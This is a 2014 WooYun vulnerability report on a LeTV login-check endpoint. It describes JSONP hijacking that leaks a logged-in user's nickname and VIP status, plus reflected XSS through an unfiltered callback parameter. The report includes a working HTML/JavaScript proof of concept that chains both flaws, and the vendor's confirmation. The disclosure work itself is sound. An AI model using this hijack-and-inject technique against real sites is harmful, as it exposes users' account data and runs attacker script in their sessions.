当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-064465

漏洞标题:乐视网某url xss+js hijack(一个洞洞两个用法)

相关厂商:乐视网

漏洞作者: xsjswt

提交时间:2014-06-11 11:30

修复时间:2014-07-26 11:34

公开时间:2014-07-26 11:34

漏洞类型:CSRF

危害等级:中

自评Rank:6

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-11: 细节已通知厂商并且等待厂商处理中
2014-06-11: 厂商已经确认,细节仅向厂商公开
2014-06-21: 细节向核心白帽子及相关领域专家公开
2014-07-01: 细节向普通白帽子公开
2014-07-11: 细节向实习白帽子公开
2014-07-26: 细节向公众公开

简要描述:

同一个url,可以xss,也可以hijack,为什么你sobug非要把两个不一样的漏洞认定为同一个漏洞呢。那我就发乌云试试

详细说明:

http://yuanxian.letv.com/letv/net/checkLogin.jsp?callback=xxx
这个url存在两处问题
1. 没有限制referer,也没有csrf token,可以js hijck读到来访用户在乐视的信息
2. callback没有任何限制,可以导致反射型xss

漏洞证明:

<html>
<body>
<div id='x' name='x'></div>
<script>
function xx(obj){
        x.innerHTML='亲爱的乐视网网友:'+obj.nickname+'.<br />通过我们的检测发现,你'+(obj.isvip?'是乐视的VIP会员,好高大上.':'不是乐视
网的会员,好屌丝.')+'<br />接下来我们要对你发动xss攻击了';
        var o=document.createElement('iframe');
        o.height=1;
        o.width=1;
        o.src='http://yuanxian.letv.com/letv/net/checkLogin.jsp?callback=<script>alert("hello '+obj.nickname+'. This is the alert fr
om: "%2bdocument.domain);<'+'/script>';
        document.body.appendChild(o);
}
</script>
<script src='http://yuanxian.letv.com/letv/net/checkLogin.jsp?callback=xx'>
</script>
1.png







2.png

修复方案:

问下sobug的人,他们最专业了

版权声明:转载请注明来源 xsjswt@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-06-11 11:33

厂商回复:

好问题,值得大家探讨,先通知修复吧~

最新状态:

暂无